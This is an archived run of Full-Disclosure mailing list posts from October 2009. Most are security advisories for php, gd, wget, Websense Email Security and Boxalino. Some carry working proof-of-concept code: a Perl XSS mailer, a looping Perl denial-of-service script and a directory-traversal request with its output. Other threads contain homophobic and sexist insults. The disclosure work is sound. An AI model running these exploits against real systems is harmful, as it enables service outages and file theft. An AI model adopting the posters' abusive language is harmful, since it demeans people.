Re: [Full-disclosure] Yahoo! apologises for lap dance at hack event
What the fuck is this world coming to. A million plagues to whoever complained. Yahoo don't apologize for shit! The dude in the photo looks sus too, pocket rocket titties right in front and he's looking at the nerds on the sideline. Don't worry faggot, Jesus isn't crying for you. -- ciao JT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo! apologises for lap dance at hack event
Yeah, I saw the outcry over this at reddit. To be fair though, "booth babes" are a fairly common part of culture over there. Even street vendors use them. --Rohit Patnaik On Tue, Oct 20, 2009 at 10:14 PM, Stack Smasher wrote: > Why should they apologize? > > Hackers love lap dances! > > > > > On Tue, Oct 20, 2009 at 9:01 PM, Ivan . wrote: > >> yahoo rocks! >> >> >> http://www.brisbanetimes.com.au/technology/technology-news/yahoo-apologises-for-lap-dance-at-hack-event-20091021-h7sr.html >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > > -- > "If you see me laughing, you better have backups" > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo! apologises for lap dance at hack event
Why should they apologize? Hackers love lap dances! On Tue, Oct 20, 2009 at 9:01 PM, Ivan . wrote: > yahoo rocks! > > > http://www.brisbanetimes.com.au/technology/technology-news/yahoo-apologises-for-lap-dance-at-hack-event-20091021-h7sr.html > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- "If you see me laughing, you better have backups" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Yahoo! apologises for lap dance at hack event
yahoo rocks! http://www.brisbanetimes.com.au/technology/technology-news/yahoo-apologises-for-lap-dance-at-hack-event-20091021-h7sr.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] milw0rm
str0ke phone home! All of the security industries pen testers are losing valuable business! Perhaps str0ke is locked up someones basement being sodomized by a gimp. On Tue, Oct 20, 2009 at 7:06 AM, xsr wrote: > > The french blog url was posted in July, i think i've read somewhere that > str0ke had changed his mind after that to continue milw0rm again. For a > site, even being referenced by cve.mitre, i still fail to understand the > current update delay though. > > > -- > xsr > > -- ciao JT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:285 ] php
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:285 http://www.mandriva.com/security/ ___ Package : php Date: October 20, 2009 Affected: 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, Enterprise Server 5.0, Multi Network Firewall 2.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in php: The _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the GD Graphics Library 2.x, does not properly verify a certain colorsTotal structure member, which might allow remote attackers to conduct buffer overflow or buffer over-read attacks via a crafted GD file, a different vulnerability than CVE-2009-3293. NOTE: some of these details are obtained from third party information (CVE-2009-3546). Added two upstream patches to address a bypass vulnerability in open_basedir and safe_mode. Additionally on CS4 a regression was found and fixed when using the gd-bundled.so variant from the php-gd package. This update fixes these vulnerabilities. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3546 ___ Updated Packages: Mandriva Linux 2009.0: 69554fcbfb1a1a891d7421ea4e05 2009.0/i586/libphp5_common5-5.2.6-18.8mdv2009.0.i586.rpm a29d013559d88483be96b970894d5143 2009.0/i586/php-bcmath-5.2.6-18.8mdv2009.0.i586.rpm 57199b9d26a63561c3fa0b33810acbd8 2009.0/i586/php-bz2-5.2.6-18.8mdv2009.0.i586.rpm 0347ece7bd243a1144e3bab50955b738 2009.0/i586/php-calendar-5.2.6-18.8mdv2009.0.i586.rpm 5b1f8d4c3f803e0332a4bfd02a643d1f 2009.0/i586/php-cgi-5.2.6-18.8mdv2009.0.i586.rpm 1abfde7befff3a8d3bee596064b18bb9 2009.0/i586/php-cli-5.2.6-18.8mdv2009.0.i586.rpm b9584467d19e5ec8ddc045aac6e21153 2009.0/i586/php-ctype-5.2.6-18.8mdv2009.0.i586.rpm 70eb2b38c8c51429eafc51a80011a84b 2009.0/i586/php-curl-5.2.6-18.8mdv2009.0.i586.rpm 0f1b274d176bc2d76d9f3c8f272c3001 2009.0/i586/php-dba-5.2.6-18.8mdv2009.0.i586.rpm fe4b25fd669e16e35ddd797590dc2512 2009.0/i586/php-dbase-5.2.6-18.8mdv2009.0.i586.rpm a4e3f5acaa345838b65de66448edc816 2009.0/i586/php-devel-5.2.6-18.8mdv2009.0.i586.rpm ea7ba580bd23bc6b8f25f74e24fd5975 2009.0/i586/php-dom-5.2.6-18.8mdv2009.0.i586.rpm 42ef61d2108b059de1ed250cede07173 2009.0/i586/php-exif-5.2.6-18.8mdv2009.0.i586.rpm d4e9e8d9630bd785630a7f2c4bb750bc 2009.0/i586/php-fcgi-5.2.6-18.8mdv2009.0.i586.rpm f57b9de16acf5548ad41d638a6ea30d7 2009.0/i586/php-filter-5.2.6-18.8mdv2009.0.i586.rpm c8021948fda6d6ab9cb088767eccdcfd 2009.0/i586/php-ftp-5.2.6-18.8mdv2009.0.i586.rpm 9d1c568328e8a56db8c7644160c19eda 2009.0/i586/php-gd-5.2.6-18.8mdv2009.0.i586.rpm f667b8bacac17e8077018664dbfeb1ea 2009.0/i586/php-gettext-5.2.6-18.8mdv2009.0.i586.rpm 84810d44230dbff237c1165b1c25d618 2009.0/i586/php-gmp-5.2.6-18.8mdv2009.0.i586.rpm 14b3e06566f4d6c9811dc2509e0501e6 2009.0/i586/php-hash-5.2.6-18.8mdv2009.0.i586.rpm 18b1c63b2f205531491ddedd1b347440 2009.0/i586/php-iconv-5.2.6-18.8mdv2009.0.i586.rpm a446807c11f05a2c048961aee86b3f10 2009.0/i586/php-imap-5.2.6-18.8mdv2009.0.i586.rpm 1405d10b9b69189847d5bd18b9d772e6 2009.0/i586/php-json-5.2.6-18.8mdv2009.0.i586.rpm 3492191c35ebdc73d816f40626a792ff 2009.0/i586/php-ldap-5.2.6-18.8mdv2009.0.i586.rpm 8c97fd0837b5d8001fd3824dd64e1581 2009.0/i586/php-mbstring-5.2.6-18.8mdv2009.0.i586.rpm 3e49a2c8e8c454033c80197c3ae95438 2009.0/i586/php-mcrypt-5.2.6-18.8mdv2009.0.i586.rpm cb8ecce52479f8de00b333ef16bc081e 2009.0/i586/php-mhash-5.2.6-18.8mdv2009.0.i586.rpm 82aba64fa7b49c92d93d8bc0a2b565f3 2009.0/i586/php-mime_magic-5.2.6-18.8mdv2009.0.i586.rpm 20f7e4799e1614676a846943b5abbe85 2009.0/i586/php-ming-5.2.6-18.8mdv2009.0.i586.rpm a456a83f2a854e10d55b911df7b51466 2009.0/i586/php-mssql-5.2.6-18.8mdv2009.0.i586.rpm 2804a9875d86ef5e2b466358617115a5 2009.0/i586/php-mysql-5.2.6-18.8mdv2009.0.i586.rpm 182e336860291e1989a9d447c69629dd 2009.0/i586/php-mysqli-5.2.6-18.8mdv2009.0.i586.rpm 94cb74a76d8e8d1cf2a585255d97c6c3 2009.0/i586/php-ncurses-5.2.6-18.8mdv2009.0.i586.rpm 89eddc237a68339bc05e2d2b7d7b8c3f 2009.0/i586/php-odbc-5.2.6-18.8mdv2009.0.i586.rpm 80d5d9183bcabc41461301dbfdb8f46e 2009.0/i586/php-openssl-5.2.6-18.8mdv2009.0.i586.rpm 2a572a418a097698e4ac424951a590d4 2009.0/i586/php-pcntl-5.2.6-18.8mdv2009.0.i586.rpm 122863bde2fe7ae2a2209d2ac7c21680 2009.0/i586/php-pdo-5.2.6-18.8mdv2009.0.i586.rpm 369c6000c11804a7acd47d30fcc268b6 2009.0/i586/php-pdo_dblib-5.2.6-18.8mdv2009.0.i586.rpm 65f250575afd7c66e1cb422c9693569f 2009.0/i586/php-pdo_mysql-5.2.6-18.8mdv2009.0.i586.rpm de38263ebb45d4b47067ad722f6c9532
[Full-disclosure] [ GLSA 200910-01 ] Wget: Certificate validation error
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200910-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Wget: Certificate validation error Date: October 20, 2009 Bugs: #286058 ID: 200910-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An error in the X.509 certificate handling of Wget might enable remote attackers to conduct man-in-the-middle attacks. Background == GNU Wget is a free software package for retrieving files using HTTP, HTTPS and FTP, the most widely-used Internet protocols. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-misc/wget < 1.12>= 1.12 Description === The vendor reported that Wget does not properly handle Common Name (CN) fields in X.509 certificates that contain an ASCII NUL (\0) character. Specifically, the processing of such fields is stopped at the first occurrence of a NUL character. This type of vulnerability was recently discovered by Dan Kaminsky and Moxie Marlinspike. Impact == A remote attacker might employ a specially crafted X.509 certificate, containing a NUL character in the Common Name field to conduct man-in-the-middle attacks on SSL connections made using Wget. Workaround == There is no known workaround at this time. Resolution == All Wget users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-misc/wget-1.12 References == [ 1 ] CVE-2009-3490 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3490 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200910-01.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NSOADV-2009-003: Websense Email Security Cross Site Scripting
_
Security Advisory NSOADV-2009-003
_
_
Title: Websense Email Security Cross Site Scripting
Severity: Low
Advisory ID:NSOADV-2009-003
Found Date: 28.09.2009
Date Reported: 01.10.2009
Release Date: 20.10.2009
Author: Nikolas Sotiriu
Mail: nso-research (at) sotiriu.de
URL:http://sotiriu.de/adv/NSOADV-2009-003.txt
Vendor: Websense (http://www.websense.com/)
Affected Products: Websense Email Security v7.1
Personal Email Manager v7.1
Not Affected Products: Websense Email Security v7.1 Hotfix 4
Personal Email Manager v7.1 Hotfix 4
Remote Exploitable: Yes
Local Exploitable: Yes
Patch Status: Patched with Hotfix 4
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: for the permission to use his
Policy
Background:
===
Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.
(Product description from Websense Website)
The Websense Email Security Web Administrator is a webfrontend, which
enables you to access the message administration, directory management
and to view the log.
Description:
1. XSS in webfrontend:
--
The webfrontend do not properly sanitize some variables before being
returned to the user.
http://:8181/web/msgList/viewmsg/actions/msgAnalyse.asp \
?Queue=Network%20Security&FileName=[XSS]&IsolatedMessageID=[XSS] \
&ServerName=[XSS]&Dictionary=[XSS]&Scoring=[XSS]&MessagePart=[XSS]
http://:8181/web/msgList/viewmsg/actions/msgForwardToRis \
kFilter.asp?Queue=[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]& \
ServerName=[XSS]
http://:8181/web/msgList/viewmsg/viewHeaders.asp?Queue= \
[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]&ServerName=[XSS]
This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of the Web Administrator frontend.
2. XSS in webfrontend through a Mail Subject:
-
The Subject of an email sent through the Websense Mail Security
server is not properly sanitized before shown in the Web Administrator
frontend.
Script code like ">alert('X') will be executed in
the users's browser in context of the Web Administrator frontend.
The Mail has to be hold in a Queue to execute the code if the
administrator checks it. A Subject like
VIAGRA">alert('XSS')
will result in a hold in the Anti Spam Queue.
Proof of Concept :
==
#!/usr/bin/perl
use MIME::Lite;
use Net::SMTP;
(($server = $ARGV[0]) && ($rcpt = $ARGV[1])) || die "Usage: $0",
" \n";
my $from_address = '';
my $to_address = "<" . $rcpt . ">";
my $mail_host = $server;
my $subject = 'VIAGRA XSS File ">';
my $message_body = "XSS Test File";
$msg = MIME::Lite->new (
From => $from_address,
To => $to_address,
Subject => $subject,
Type =>'multipart/mixed'
) or die "Error creating multipart container: $!\n";
$msg->attach (
Type => 'TEXT',
Data => $message_body
) or die "Error adding the text message part: $!\n";
MIME::Lite->send('smtp', $mail_host, Timeout=>60);
$msg->send;
Solution:
=
Vendor released a patch.
http://tinyurl.com/yhe3hqa
Disclosure Timeline (/MM/DD):
=
2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent there PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
date to Vendor
2009.10.08: Websense verifies the finding
2009.10.13: Websense fixed it. The path will be available in Version 7.2
which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the
release date to 2009.10.29.
(no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NSOADV-2009-002: Websense Email Security Web Administrator DoS
_
Security Advisory NSOADV-2009-002
_
_
Title: Websense Email Security Web Administrator DoS
Severity: Low
Advisory ID:NSOADV-2009-002
Found Date: 28.09.2009
Date Reported: 01.10.2009
Release Date: 20.10.2009
Author: Nikolas Sotiriu
Mail: nso-research (at) sotiriu.de
URL:http://sotiriu.de/adv/NSOADV-2009-002.txt
Vendor: Websense (http://www.websense.com/)
Affected Products: Websense Email Security v7.1
Personal Email Manager v7.1
Not Affected Products: Websense Email Security v7.1 Hotfix 4
Personal Email Manager v7.1 Hotfix 4
Remote Exploitable: Yes
Local Exploitable: Yes
Patch Status: Patched with Hotfix 4
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: for the permission to use his
Policy
Background:
===
Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.
(Product description from Websense Website)
The Websense Email Security Web Administrator is a webfrontend, which
enables you to access the message administration, directory management
and to view the log.
Description:
The Web Administrator frontend (STEMWADM.EXE) listens by default on port
TCP/8181.
If an attacker sends a HTTP Request to port 8181 without waiting for a
response the webserver crashes. The proof of concept script just sends
a "GET /index.asp" and closes the socket. The server can not response
to the request anymore and dies.
By default the service will always restart after a crash. So the poc
will send the request until it will be stopped.
Proof of Concept :
==
#!/usr/bin/perl
use Socket;
(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ",
" \n";
print "\nThe Webserver on http://$target:$port should be dead until",
"this script is running\n";
while (1) {
$ip = inet_aton($target) || die "host($target) not found.\n";
$sockaddr = pack_sockaddr_in($port, $ip);
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n";
connect(SOCKET, $sockaddr) || die "connect $target $port error.\n";
print SOCKET "GET /index.asp";
print "Request sent ...\n";
close(SOCKET);
sleep 1;
};
Solution:
=
Vendor released a patch.
http://tinyurl.com/yhe3hqa
Disclosure Timeline (/MM/DD):
=
2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent there PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
date to Vendor
2009.10.08: Websense was not able to reproduce the DoS Problem
2009.10.08: Sent a mail with more explanation
2009.10.13: Websense verifies the finding and fixed it. The path will be
available in Version 7.2 which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the
release date to 2009.10.29.
(no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:284 ] gd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:284 http://www.mandriva.com/security/ ___ Package : gd Date: October 20, 2009 Affected: 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, Enterprise Server 5.0, Multi Network Firewall 2.0 ___ Problem Description: A vulnerability has been found and corrected in gd: The _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the GD Graphics Library 2.x, does not properly verify a certain colorsTotal structure member, which might allow remote attackers to conduct buffer overflow or buffer over-read attacks via a crafted GD file, a different vulnerability than CVE-2009-3293. NOTE: some of these details are obtained from third party information (CVE-2009-3546). This update fixes this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3546 ___ Updated Packages: Mandriva Linux 2009.0: 6c866bae01f25d5dc270d3adbbd5d993 2009.0/i586/gd-utils-2.0.35-6.1mdv2009.0.i586.rpm bd8887aeba9889fcdcb2cda16a6a53de 2009.0/i586/libgd2-2.0.35-6.1mdv2009.0.i586.rpm 88e7ebdf94c3493e816ffd512a2807a1 2009.0/i586/libgd-devel-2.0.35-6.1mdv2009.0.i586.rpm d053ec9518ec742e3bc36353337b686d 2009.0/i586/libgd-static-devel-2.0.35-6.1mdv2009.0.i586.rpm 754f5c9783f4b5f7b1b117b18cca15d6 2009.0/SRPMS/gd-2.0.35-6.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: c8ea9db1a2900f0bf6126322df6516c3 2009.0/x86_64/gd-utils-2.0.35-6.1mdv2009.0.x86_64.rpm ce2d31ad700733f16bae12aa67a7e7ef 2009.0/x86_64/lib64gd2-2.0.35-6.1mdv2009.0.x86_64.rpm e5930aa4e9470a02c2d3ed35a9de8157 2009.0/x86_64/lib64gd-devel-2.0.35-6.1mdv2009.0.x86_64.rpm a65dc17ce7c3814423c7274edd58d105 2009.0/x86_64/lib64gd-static-devel-2.0.35-6.1mdv2009.0.x86_64.rpm 754f5c9783f4b5f7b1b117b18cca15d6 2009.0/SRPMS/gd-2.0.35-6.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 05f81dc2f0895b4a3466cd855e43d4de 2009.1/i586/gd-utils-2.0.35-8.1mdv2009.1.i586.rpm f52e6f8eb0bd1ef751ac64eeffe514ac 2009.1/i586/libgd2-2.0.35-8.1mdv2009.1.i586.rpm 55d6d5fce499049e0f06f8e98e4bbfe2 2009.1/i586/libgd-devel-2.0.35-8.1mdv2009.1.i586.rpm 546237c9a13ad9ee1abfe59f70fb79fd 2009.1/i586/libgd-static-devel-2.0.35-8.1mdv2009.1.i586.rpm 35226b6d2166537c4b797fb2f031fbeb 2009.1/SRPMS/gd-2.0.35-8.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: de8bdbcb765b3db98246ded84df3d247 2009.1/x86_64/gd-utils-2.0.35-8.1mdv2009.1.x86_64.rpm b20cc886a69f5bea68421326db8a881e 2009.1/x86_64/lib64gd2-2.0.35-8.1mdv2009.1.x86_64.rpm 4163f9180cfbd869f8e1309df343f739 2009.1/x86_64/lib64gd-devel-2.0.35-8.1mdv2009.1.x86_64.rpm 3b55d54e9428b159a707321717ad93c8 2009.1/x86_64/lib64gd-static-devel-2.0.35-8.1mdv2009.1.x86_64.rpm 35226b6d2166537c4b797fb2f031fbeb 2009.1/SRPMS/gd-2.0.35-8.1mdv2009.1.src.rpm Corporate 3.0: 403f12a5a250eb7b19747e98acca455a corporate/3.0/i586/gd-utils-2.0.15-4.3.C30mdk.i586.rpm 63236e5b8c12a00613db49d7efbaf219 corporate/3.0/i586/libgd2-2.0.15-4.3.C30mdk.i586.rpm 2413a31873e5a12de7f91b9813edceac corporate/3.0/i586/libgd2-devel-2.0.15-4.3.C30mdk.i586.rpm 3c790eb64d13da72fd5233b231a37048 corporate/3.0/i586/libgd2-static-devel-2.0.15-4.3.C30mdk.i586.rpm e53ea6c39ecf645109440a1b6d766753 corporate/3.0/SRPMS/gd-2.0.15-4.3.C30mdk.src.rpm Corporate 3.0/X86_64: b9ed91e59a55df1ca59f4982d1cf38e7 corporate/3.0/x86_64/gd-utils-2.0.15-4.3.C30mdk.x86_64.rpm 0e7b3b8f25571fd79f7a618ba14095b7 corporate/3.0/x86_64/lib64gd2-2.0.15-4.3.C30mdk.x86_64.rpm b3fee4c8dac6089c5da355e505c3b54e corporate/3.0/x86_64/lib64gd2-devel-2.0.15-4.3.C30mdk.x86_64.rpm 74cd55856ed0275d795db3f7ae5b6081 corporate/3.0/x86_64/lib64gd2-static-devel-2.0.15-4.3.C30mdk.x86_64.rpm e53ea6c39ecf645109440a1b6d766753 corporate/3.0/SRPMS/gd-2.0.15-4.3.C30mdk.src.rpm Corporate 4.0: 2c26534467a1c98718bc2bb20e54bcab corporate/4.0/i586/gd-utils-2.0.33-3.6.20060mlcs4.i586.rpm 59601ba68440a1b0fd34c418d6c4716b corporate/4.0/i586/libgd2-2.0.33-3.6.20060mlcs4.i586.rpm feaaa0d30efbfded9b2423bd843449d5 corporate/4.0/i586/libgd2-devel-2.0.33-3.6.20060mlcs4.i586.rpm ca9df591a9e6e6df86573ea89f1d12dc corporate/4.0/i586/libgd2-static-devel-2.0.33-3.6.20060mlcs4.i586.rpm eae43b418d8217f8a1525a6d9708104b corporate/4.0/SRPMS/gd-2.0.33-3.6.20060mlcs4.src.rpm Corporate 4.0/X86_64: 41af6c4d472865a1980f10f0b23f5d02 corporate/4.0/x86_64/gd-utils-2.0.33-3.6.20060mlcs4.x86_64.rpm 0f3cb929bf45c233a2fc79a21065f259 corporate/4.0/x86_64/lib64gd2-2.0.33-3.6.20060mlcs4.x86_64.rpm f6a11970d270993097348cb3572db65c corporate/4.0/x86_64/lib64gd2-devel-2.0.33
Re: [Full-disclosure] milw0rm
The french blog url was posted in July, i think i've read somewhere that str0ke had changed his mind after that to continue milw0rm again. For a site, even being referenced by cve.mitre, i still fail to understand the current update delay though. -- xsr ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2009-1479] Boxalino - Directory Traversal Vulnerability
# # # COMPASS SECURITY ADVISORY # http://www.csnc.ch/en/downloads/advisories.html # # # # Product: Boxalino # Vendor: Boxalino AG (www.boxalino.com) # CVD ID: CVE-2009-1479 # Subject: Directory Traversal Vulnerabilities # Risk: High # Effect: Remotely exploitable # Author: Axel Neumann # Date: 2009-10-20 # # Introduction An Directory Traversal vulnerability exists in the collaboration platform Boxalino [1]. Remote exploitation of a directory traversal vulnerability in Boxalino's product allows attackers to read arbitrary files on the server file system with web server privileges. Affected Vulnerable: * Boxalino (closed-source product) Not vulnerable: * Unknown Not tested: * N/A Technical Description - When handling HTTP requests, Boxalino does not properly check for directory traversal specifiers. Therefore, by including a sequence such as "../../../", an attacker is able to read files outside of the intended location. The vulnerability exists for both, Windows and UNIX based systems. POST /boxalino/client/desktop/default.htm HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5 Host: www.example.ch Content-Length: 256 Cookie: JSESSIONID=A57AABD5F2051C4333F500EBB1232295 Connection: Close Pragma: no-cache url=../../../../../../../../boot.ini&login_loginName=example&login_loginPassword=example&login_cmd_logon=Login&defaultAction=Example&login_cmd_logon_resultPage=%2Fboxalino%2Fclient%2Fdesktop%2Fdefault%2Ehtm HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Expires: Tues, 01 Jan 1980 00:00:00 GMT Content-Type: text/html Content-Length: 208 Date: Wed, 29 Apr 2009 09:01:06 GMT Connection: close [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /noexecute=optout /fastdetect Workaround / Fix Update to Boxalino Version 09.05.25-0421 Timeline 2009-10-20: Advisory Release 2009-05-26: Release of fixed Boxalino Version / Patch 2009-05-25: Initial vendor response 2009-04-30: Initial vendor notification 2009-04-29: Assigned CVE-2009-1479 2009-04-29: Discovery by Axel Neumann References -- [1] http://www.boxalino.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
